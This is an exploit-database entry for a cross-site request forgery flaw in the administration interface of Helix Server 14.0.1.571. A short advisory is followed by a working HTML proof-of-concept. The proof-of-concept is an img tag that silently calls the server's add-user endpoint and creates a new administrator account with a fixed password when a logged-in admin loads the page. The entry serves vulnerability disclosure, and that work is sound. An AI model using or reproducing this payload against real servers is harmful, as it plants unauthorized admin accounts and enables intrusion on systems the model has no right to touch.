Helix Server 14.0.1.571 - Administration Interface Cross-Site Request Forgery



EKU-ID: 39750 CVE: OSVDB-ID:
Author: John Leitch Published: 2010-12-10 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/45340/info

Helix Server is prone to a cross-site request-forgery vulnerability.

An attacker can exploit this issue to perform unauthorized actions by enticing a logged-in user to visit a malicious site.

Helix Server 14.0.1.571 is vulnerable; other versions may also be affected.

<html>
    <body>
        <img src="http://www.example.com/admin/auth.adduser.html?respage=config_results.nc.html&name=new_admin&pass=Password1&realm=TESTBOX.AdminRealm" />
    </body>
</html>